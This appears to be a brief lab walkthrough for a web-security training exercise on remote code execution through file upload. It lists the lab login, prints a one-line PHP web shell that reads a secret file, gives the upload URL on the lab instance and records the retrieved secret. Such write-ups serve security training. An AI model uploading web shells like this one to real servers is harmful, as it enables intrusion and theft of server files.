Remote code execution via web shell upload

Remote code execution via web shell upload

Solution

Login to PA as user wiener

L: wiener
P: peter

Upload payload: webshell.php

┌──(kali㉿kali)-[~/Desktop/writeups/PortSwigger/Remote code execution via web shell upload]
└─$ cat webshell.php                                   
<?php echo file_get_contents('/home/carlos/secret'); ?>

Open location: view-source:https://0ada00b504deee53bb0e6c85000500ae.web-security-academy.net/files/avatars/webshell.php

PSdwOPwuZN2UDDyuDN7UYaYa0ugo3mS6

Submit solution